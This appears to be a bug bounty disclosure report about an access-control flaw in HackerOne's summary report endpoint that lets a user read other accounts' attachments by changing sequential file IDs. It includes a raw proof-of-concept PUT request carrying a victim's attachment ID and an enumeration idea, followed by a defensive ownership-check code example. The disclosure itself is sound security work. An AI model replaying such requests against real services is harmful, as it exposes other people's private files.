Summary:
HackerOne provides a form for reporting vulnerabilities to various programs. The form supports uploading files and previews (images or videos), but it does not allow using file IDs belonging to other accounts. However, with the summary report feature I as a hacker can reveal files belonging to other users just by changing the ID. This is very severe.
Description:
I have tried to call files belonging to other accounts through the submit report and edit report forms, but it doesn't work; it always gets the response `"was_successful":false`. Fortunately, I could find another endpoint that is able to read files belonging to other accounts, namely the summary report feature.
If you look at the video I attached, I made two scenarios there, "failed to read other account files" and "successfully read other account files". The steps are as follows:
Note: left is the victim, right is the attacker.
{F3155289}
I don't know, uploading large files takes too long as an attachment, so I just put the PoC on YouTube: https://████ (private video)
or on Google Drive, if the YouTube video can't be seen yet: https://███████
#### Raw text in video:
attachment leaked via add summary report:
victim file id:
3155239
I WILL CHANGE F3155244 TO 3155239
ATTACKER files:
3155241
3155242
"was_successful":true, (IF FILE FROM ATTACKER) I WILL CHANGE TO VICTIM FILE
"was_successful":false, WILL BE FALSE
trying leak via content: false positive
leak via summary: successful
```
PUT /reports/████/summaries/███████ HTTP/2
Host: hackerone.com
..... all headers ...
Content-Length: 908
Origin: https://hackerone.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

{"id":████████,"category":"researcher","content":"TESTEDIT\n\n{F3155244} ","updated_at":"2024-03-30T17:16:29.625Z","user":{"id":█████,"username":"█████","name":"██████████████","bio":"please see pdfx","cleared":false,"verified":false,"website":null,"location":"","created_at":"2024-03-29T11:27:50.077Z","url":"https://hackerone.com/██████████","hackerone_triager":false,"hackerone_employee":false,"user_type":"hacker","profile_picture_urls":{"small":"/assets/avatars/default-█████.png","medium":"/assets/avatars/default-███████.png","xtralarge":"/assets/avatars/default-███████.png"}},"can_view?":true,"can_create?":true,"attachments":[],"action_type":"publish","attachment_ids":[
3155239]}
```
This is very bad, especially since the file ID is only a sequential number. I can just add all the file IDs of HackerOne accounts. I can see other people's PoCs if they are videos.
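As an added defensive illustration (example code, not HackerOne's implementation), this is the kind of ownership check the summary endpoint is missing: every attachment referenced by a summary update, whether listed in `attachment_ids` or embedded as an `{F<id>}` token in `content`, must have been uploaded by the requesting user for the report being edited, and the whole update fails otherwise. The attachment store, user IDs and report IDs below are constructed for the example.

```python
import re

# Constructed sample attachment store: file id -> owner user id and report id.
# The user/report ids are made up; the file ids mirror the ones in the report.
ATTACHMENTS = {
    3155239: {"owner": 101, "report": 5001},  # uploaded by the "victim"
    3155241: {"owner": 202, "report": 5002},  # uploaded by the requester
    3155242: {"owner": 202, "report": 5002},
}

# Inline attachment references look like {F3155244} in the content body.
REF_PATTERN = re.compile(r"\{F(\d+)\}")


def referenced_attachment_ids(content: str, attachment_ids: list[int]) -> set[int]:
    """Collect every attachment id a summary update refers to, from both the
    explicit attachment_ids array and the {F<id>} tokens in the content."""
    ids = set(attachment_ids)
    ids.update(int(m) for m in REF_PATTERN.findall(content))
    return ids


def authorize_summary_update(user_id: int, report_id: int,
                             content: str, attachment_ids: list[int]) -> dict:
    """Server-side ownership check for the summary endpoint.

    Each referenced attachment must exist and belong to the requesting user
    and to this report. One bad id rejects the entire update, so an attacker
    cannot mix their own files with someone else's to slip one through."""
    rejected = []
    for fid in sorted(referenced_attachment_ids(content, attachment_ids)):
        meta = ATTACHMENTS.get(fid)
        if meta is None or meta["owner"] != user_id or meta["report"] != report_id:
            rejected.append(fid)
    if rejected:
        # Same response shape the hardened endpoints return. Do not reveal
        # whether a rejected id exists, only that the caller may not use it.
        return {"was_successful": False,
                "errors": {"attachment_ids": "not owned by requester"}}
    return {"was_successful": True}
```

The check also closes the sequential-ID enumeration described above, because a guessed ID belonging to another account is rejected regardless of which field carries it.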